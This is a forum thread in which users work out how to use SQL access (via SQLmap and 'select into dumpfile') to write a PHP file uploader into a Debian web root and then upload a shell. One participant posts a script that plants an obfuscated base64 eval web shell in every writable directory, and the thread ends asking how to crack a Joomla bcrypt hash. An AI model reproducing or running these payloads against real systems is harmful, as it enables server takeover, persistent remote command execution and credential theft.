MySQL problem with inserting PHP code into DB

[DrMTR]

Hi to all !

I testing vulnerable app in localhost, and try to insert php upload form code into db table, but give me MySQL syntax error every time i tryed..

This htm form successfully inserted into DB via SQLmap

insert into userform values ('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> 
<head>Upload File</head>
<body>
<<form enctype="multipart/form-data" action="uploader.php" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="100000" />
Choose a file to upload: <input name="uploadedfile" type="file" /><br />
<input type="submit" value="Upload File" />
</form>
</body>
</html>');

but this give me SQL syntax error in line 1 every time, when try to insert into DB:

insert into user_upload values ('
<?php
$target_path = '/var/www/';

$target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 

if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
    echo "The file ".  basename( $_FILES['uploadedfile']['name']). 
    " has been uploaded";
} else{
    echo "There was an error uploading the file, please try again!";
}
?>');

Where is the problem.?

I forget to tell that DB tables are allready created into DB exploitdb.

[digininja]

You hvae a quoted string which you are breaking out of with quotes in the lines you are injecting, try changing all the quotes in the string to double quotes and the outside ones to single.

Sounds like an interesting vulnerability where you can pull a contents from a database and get them executed.

[DrMTR]

Yeah its single quotes, but why then first form (htm form) inserted successfully into db, and second give me SQL error.? Can you change the quotes, and then try to insert into db table again.?

[cooper]

The way SQL works is that when you want to put a string in a column, you say:

insert into table (column_name) values ('THE_DATA_TO_INSERT');

Note that the data to insert into column_name is delimited by the single quotes. When that THE_DATA_TO_INSERT itself contains single quotes, you need to escape them either by preceding each single quote with a slash (\') or, because HTML allows you to do this, use a double quote (") instead of the single quote character in your data.

[digininja]

If you look at the syntax highlighted code you've provided you'll see that in the first example all that is being inserted is green meaning it is all considered a single string, in the second example where the single quotes are closed early the text changes to black then back to green where the single quotes open again.

[DrMTR]

If you look at the syntax highlighted code you've provided you'll see that in the first example all that is being inserted is green meaning it is all considered a single string, in the second example where the single quotes are closed early the text changes to black then back to green where the single quotes open again.

So in fact if i change "blacklighted text" into " " will be OK?

insert into user_upload values ('
<?php
$target_path = "/var/www/";

$target_path = $target_path . basename( $_FILES["uploadedfile"]["name"]); 

if(move_uploaded_file($_FILES["uploadedfile"]["tmp_name"], $target_path)) {
    echo "The file ".  basename( $_FILES["uploadedfile"]["name"]). 
    " has been uploaded";
} else{
    echo "There was an error uploading the file, please try again!";
}
?>');

[digininja]

That looks ok, try it and see.

What are you exploiting, I'm curious about what vulnerability pulls code from a database and executes it

[DrMTR]

Yeah SQL code inserted into DB table, and executes into evil php uploader.

Grab the content from SQL table and dump to .php file using these command:

select * into dumpfile '/var/www/uploadform.php' from userform;

select * into dumpfile '/var/www/uploader.php' from user_upload;

After that sumply execute uploadform.php and upload your favorite shell into host. Thanks for everything guys. :)

[digininja]

That makes sense, I was thinking it was executing from the database.

If you've got file write permissions you've probably also got read permissions if you've not checked that already.

[DrMTR]

Yea you must have /var/www/ writable :)

[digininja]

Or have local file inclusion.

I tend to look for file upload features on sites which allow uploads into the document root, usually folders called userdata or uploads, they are writable when the rest isn't

[cooper]

Which distro uses /var/www for this though? On my Gentoo's Apache install the root folder is /var/www/<hostname>/htdocs for instance.

[GuardMoony]

debian

[DrMTR]

Yeah, its debian OS.

[i8igmac]

Ill provide some of my exciting automation :-p

this little snipp will recursively scan directorys for writable permissions and then write a small shell...

If you have php execution, phpinfo(); then try eval(codebelow);

carefule, this may write a few thousand shells to ur hard drive :-)

chdir('../');

$path = realpath(getcwd());

$objects = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path), RecursiveIteratorIterator::SELF_FIRST);

foreach($objects as $name => $object){

        if (is_dir($name)) {

                if (is_writable($name))  {

                        echo $name . ' ';

                        file_put_contents($name. '/tmp.php', base64_decode("PD9ldmFsKGJhc2U2NF9kZWNvZGUoJF9HRVRbY214eXpdKSk7Pz4="));

                }

        }

}

[DrMTR]

^^ Thanks for script. Its very usefull for finding writable folders. I dont want to open a new thread, did someone know why this Joomla hash is very long compared with other hash in DB

$2y$10$bTQfeWF8vHD3BJ/RvoMm4uLWBD02O/YPQN9Y0NfiRlHyHlmD1FmB.

How to crack this one.?

[cooper]

Fields are separated by the $ character.

2y means "The most secure version of Blowfish"

10 is the amount of blowfish iterations.

The remainder is the blowfish hash where I suspect the bit up to the slash is the salt and the remainder the actual hash value.